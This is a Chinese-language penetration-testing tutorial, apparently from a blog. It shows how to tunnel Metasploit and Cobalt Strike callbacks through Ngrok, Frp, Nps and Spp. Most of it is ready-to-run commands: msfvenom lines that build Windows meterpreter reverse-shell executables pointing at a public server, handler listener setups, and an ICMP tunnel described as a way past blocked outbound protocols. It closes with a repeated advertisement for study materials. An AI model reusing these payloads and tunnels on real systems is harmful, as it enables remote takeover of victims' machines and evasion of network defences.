优点:穿透加密数据,中间平台,防追踪,解决网络问题
内网穿透:Ngrok
项目地址:内网转发
免费版:仅支持三种协议,http,https,tcp
配置服务端
开通隧道,设置Kali内网IP,Port,以及服务器开放的端口
客户端配置
Kali执行客户端,这个过程相当于Kali主动连接域名
./sunny clientid 203828291918
客户端生成后门,等待目标上线
生成木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com lport=10039 -f exe -o tcp.exe
开启监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 2233
run
目标上线
内网穿透:Frp
项目地址:https://github.com/fatedier/frp
需要一台服务器
frp是一个专注于内网穿透的高性能的反向代理应用,支持TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网IP节点的中转暴露到公网。
客户端服务端建立连接
服务端
服务器修改配置文件frps.ini 隧道建立绑定在7000端口
[common] bind_port = 7000
启动服务端
./frps -c ./frps.ini
客户端
修改配置文件frpc.ini
隧道建立绑定在7000端口
服务端的6000端口受到数据会自动转发到本地的5555端口
[common]
server_addr = 47.94.236.117
server_port = 7000
[msf]
type=tcp
local_ip=127.0.0.1
local_port=5555
remote_port=6000
启动客户端
./frpc -c ./frpc.ini
客户端与服务端建立连接
MSF生成后门,等待上线
生成后门
msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=6000 -f exe -o frp.exe
开启监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 5555
exploit
上线
内网穿透:Nps
相当于服务端搭建一个ngrok
项目地址:https://github.com/ehang-io/nps
下载项目到服务器,它有一个客户端,一个服务端
nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析等等……),此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。
服务端搭建配置
安装nps
./nps install
运行nps
./nps
默认运行地址
http://IP:8080/
默认登录账号密码
admin/123
创建客户端,生成密匙
添加协议隧道,绑定指向
将访问服务器5566端口的流量发送至客户端的6666端口
客户端配置
连接服务端
./npc -server=47.94.236.117:8024 -vkey=uajwhbu9155qh89v #创建客户端后自动生成密钥
MSF生成后门上线
生成后门
msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=5566 -f exe -o nps.exe
监听本地6666
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 6666
run
上线
内网穿透:Spp
项目地址:GitHub - esrrhs/spp: A simple and powerful proxy
支持的协议:tcp、udp、udp、icmp、http、kcp、quic
支持的类型:正向代理、反向代理、socks5正向代理、socks5反向代理
在对抗项目中有遇到过一些极端环境,比如目标封了tcp,http等常用出网的协议,但是icmp,dns等协议可能因为业务需要或者管理者安全意识不到位导致没有封干净。
在这种场景下就可以使用这些容易被忽视的协议进行隧道的搭建。
服务端
服务端运行,监听本地的ICMP流量
./spp -type server -proto ricmp -listen 0.0.0.0
客户端
受控靶机运行,将本地5555端口流量转发至47.94.236.117 80端口上(TCP封装成ICMP)
spp -name “test” -type proxy_client -server 47.94.236.117 -fromaddr :5555 -toaddr :80 -proxyproto tcp -proto ricmp
服务端收到数据
CS配置
这个CS是运行在服务端的
创建两个监听器:
监听器1:http 47.94.236.117 8081
监听器2:http 127.0.0.1 8082 生成后门放到靶机上执行
上线,生成监听器2的木马,上线监听器1
最后
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!
[外链图片转存中…(img-dJ60tJ33-1715630789557)]
[外链图片转存中…(img-pe4Wid3l-1715630789557)]
[外链图片转存中…(img-ZL1ZwfIt-1715630789558)]
[外链图片转存中…(img-QdWGYkvw-1715630789558)]
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!